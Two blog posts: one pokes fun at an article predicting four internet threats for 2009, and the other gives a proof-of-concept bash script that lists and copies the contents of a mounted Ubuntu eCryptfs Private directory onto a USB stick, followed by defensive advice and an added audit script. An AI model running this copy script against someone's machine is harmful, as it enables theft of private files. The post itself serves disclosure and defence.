
4 New Fear Mongering Tactics in 2009 3 January, 2009

Posted by aronzak in security.

An article on Slashdot today links to another article “Four Threats For ’09 That You’ve Probably Never Heard Of (Or Thought About)”. They give us four things that are new threats and will surely break the internet and cause much panic in 2009 (specifically; not any other year). Here they are:

1. An Internet “e-bomb”

A large ‘bomb’ will destroy the internet. How do we come to this conclusion? There are some flaws in TCP and DNS.

Attacks against the Internet infrastructure could very easily be next year.

Let me give you some very good wisdom from a well respected expert:

And again, the Internet is not something that you just dump something on. It’s not a big truck. It’s a series of tubes.

No, someone can’t ‘break’ the internet. It might be possible to break some of the “tubes” but not the whole series. Why? It’s not a big truck. The worst that could happen is that the internet becomes partially fragmented. And that wouldn’t be that bad. I don’t think that disruptions could last more than a few days (but you’re welcome to try!). There are backup systems for things like this. Why do we still have real stock market floors?

2. Radical extremist hackers

Attackers defaced more than 300 sites with anti-Israeli and anti-U.S. messages in the wake of Israel’s bombing of Gaza.

So a few pro-Israeli sites get hit. Surprise!

3. Attacks on online ad revenue

Ok, this is the only interesting one that isn’t just the same fear tactics dressed up. This is a genuinely new emergence. If malicious hackers use compromised ad servers to spread malware, then people will block ads. This has already largely happened with popup blocking. It’s one of the reasons that NoScript exists, which makes about half of the ads that are on the webpages I look at just appear as white space. The internet ad ecosystem currently doesn’t work very well. Already it has been found that some people are more likely to click on ads but have no intention to buy anything. They are an anomaly that means that the whole profit model is flawed.

Unfortunately, this hurts the little guys, because they end up being the ones that serve up unique content that smart users will want to look at. These are the smart users that run Fx and respond to emerging threats.

Still, this isn’t going to break the internet. Also, with the internet getting faster, bandwidth is getting cheaper. How can sites that stream megabytes of video with only a few ads on a page make money? Well, megabytes aren’t as big as they were.

4. Human casualties

This is the most and least real threat.

Three U.K. hospitals were forced to shut down their networks last month after a malware outbreak infiltrated their systems… Medical staff in some cases had to revert to using pen and paper… Human lives could be affected by a cyberattack like that of those hospitals or attacks on national infrastructures

Yes, people could die as a result of a malicious intruder attacking a hospital. Then again, it probably wouldn’t just happen at random. The idea that people all over the place could die just because of viruses is ridiculous. Almost as ridiculous as this:

Proof of concept: Attacking eCrypt Private Directories 6 November, 2008

Posted by aronzak in Encryption, Linux, security, Ubuntu.

In the new version of Ubuntu, Intrepid Ibex, users have the option of setting up a private encrypted directory in their home folder. For convenience, this uses PAM to mount it without the need to set and remember a password. This is convenient and makes cryptography accessible to the non-tech-savvy; however, convenience usually comes at the expense of security, and this seems to be no exception.

Placing your files in an encrypted home directory can defeat attempts to access the files from other users and live users (with root privileges). It does, however, mark these files out as of interest. Additionally, while the files themselves are encrypted, the file names are not masked and can be read by a user with sufficient privileges, possibly giving an indication of the contents.

Thus, it is possible to simply copy the whole folder off the system if it is left open. That means that if an adversary manages to get physical access to your machine while you are logged in (or even when you are not logged in, if they have your password), they can quickly plug in a USB stick and execute the following script on it. The following is a proof of concept for an attack to copy off the list of file names of the private directory and, if it is mounted, steal the contents.

#!/bin/bash
# eCrypt Proof of Concept
# Version 0.9 beta
# Aronzak (aronzak.wordpress.com)

echo "Aronzak's eCrypt attack Proof of Concept Beta"

date=`date +%F`
dir=`pwd`
user=`whoami`

mkdir -p $dir/attack/
mkdir -p $dir/attack/manifest
echo "Username:" > $dir/attack/manifest/$date
echo $user >> $dir/attack/manifest/$date
echo "Manifest:" >> $dir/attack/manifest/$date

echo -n "Taking manifest: "
echo $dir/attack/manifest/$date
find ~/.Private >> $dir/attack/manifest/$date

echo -n "Checking if directory is mounted: "

check=`ls -l ~/Private| grep -c "THIS DIRECTORY HAS BEEN UNMOUNTED TO PROTECT YOUR DATA --  Run mount.ecryptfs_private to mount again -> /sbin/mount.ecryptfs_private"`

if [ $check = "1" ]; then
	echo "Foiled once more!"
	echo "Directory was not mounted." >> $dir/attack/manifest/$date
fi
if [ $check = "0" ]; then
	echo "Victory is assured!"
	echo -n "Calculating size of directory: "
	du -hs ~/Private >> $dir/attack/manifest/$date
	size=`cat $dir/attack/manifest/$date | tail -n 1 | cut -f 1`
	echo $size
	gsize=`cat $dir/attack/manifest/$date | tail -n 1 | cut -f 1 | grep -c G`
	if [ $gsize = "1" ]; then
		echo "Warning: This is larger than a gigabyte."
	fi
	echo "Press Ctrl+C to abort: "
	read -s input
	echo -n "Copying: "
	mkdir -p $dir/attack/$date/
	cp -r ~/Private $dir/attack/$date/
	echo "Done"
fi

And this is the expected output if not mounted:

Aronzak's eCrypt attack Proof of Concept Beta
Taking manifest: /home/aronzak/attack/manifest/2008-11-06
Checking if directory is mounted: Foiled once more!

And if mounted:

Taking manifest: /home/aronzak/attack/manifest/2008-11-06
Checking if directory is mounted: Victory is assured!
Calculating size of directory: *****(omitted)
Press Ctrl+C to abort:
Copying: Done

So, this should be able to copy files from one user’s home directory straight to a USB stick. A warning will be given if the files are over one gigabyte.

There are two precautions to avoid this. One is to create ‘junk’ files that take up more than a gigabyte of space. That will make it harder to copy the contents to a USB stick, as it will make it slower, and many USB sticks will not have the space.

The other is to set up eCrypt to use a real password (rather than using a generated one with PAM) or upgrade to a stronger system, like TrueCrypt. It seems that the time-honoured difficulty of choosing, remembering and typing a sufficiently complicated password pays off when it comes to the security benefit. Also, this gives you access to your files regardless of OS.

Finally, if you are someone who has written or intends to write a guide about how to set up eCryptfs-tools, please make it clear that the system is not fully secure.
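A defender-side check for the two exposures this post describes (clear file names in ~/.Private, and a Private directory left mounted), added here as an example and not part of the original post. The function names and sample data are constructed; the `ECRYPTFS_FNEK_ENCRYPTED.` prefix is how later eCryptfs releases mark encrypted file names, which the post itself does not cover.

```shell
#!/bin/bash
# Added example, not from the original post. Sample data is constructed.

# Succeeds if MOUNTPOINT ($2) is listed as an ecryptfs mount in a
# /proc/mounts-format file ($1): device mountpoint fstype options ...
ecryptfs_mounted() {
    awk -v mp="$2" '$2 == mp && $3 == "ecryptfs" { found = 1 }
        END { exit !found }' "$1"
}

# Prints how many entries under the lower directory ($1) have names stored
# in the clear. Encrypted names carry the ECRYPTFS_FNEK_ENCRYPTED. prefix.
count_plaintext_names() {
    find "$1" -mindepth 1 ! -name 'ECRYPTFS_FNEK_ENCRYPTED.*' | wc -l | tr -d ' '
}

# Prints one finding per line for mounts file $1, mount point $2 and
# lower directory $3; prints nothing when neither exposure is present.
audit_private() {
    local n
    if ecryptfs_mounted "$1" "$2"; then
        echo "EXPOSED: $2 is mounted, contents readable by this session"
    fi
    n=$(count_plaintext_names "$3")
    if [ "$n" -gt 0 ]; then
        echo "LEAK: $n plaintext file name(s) visible in $3"
    fi
}

# Builds constructed sample data in a temp dir and prints its path:
# a lower directory with two clear names and one encrypted name, plus
# mounts files for the mounted and the unmounted case.
make_sample() {
    local t
    t=$(mktemp -d)
    mkdir -p "$t/.Private"
    touch "$t/.Private/tax-2008.ods" "$t/.Private/letter.odt" \
          "$t/.Private/ECRYPTFS_FNEK_ENCRYPTED.constructed-sample"
    printf '%s\n' "/dev/sda1 / ext3 rw 0 0" \
        "$t/.Private $t/Private ecryptfs rw,ecryptfs_cipher=aes 0 0" > "$t/mounts.mounted"
    printf '%s\n' "/dev/sda1 / ext3 rw 0 0" > "$t/mounts.unmounted"
    echo "$t"
}

# Demo run against the constructed sample (mounted case).
sample=$(make_sample)
audit_private "$sample/mounts.mounted" "$sample/Private" "$sample/.Private"
rm -rf "$sample"
```

On a real system the same check is `audit_private /proc/mounts "$HOME/Private" "$HOME/.Private"`.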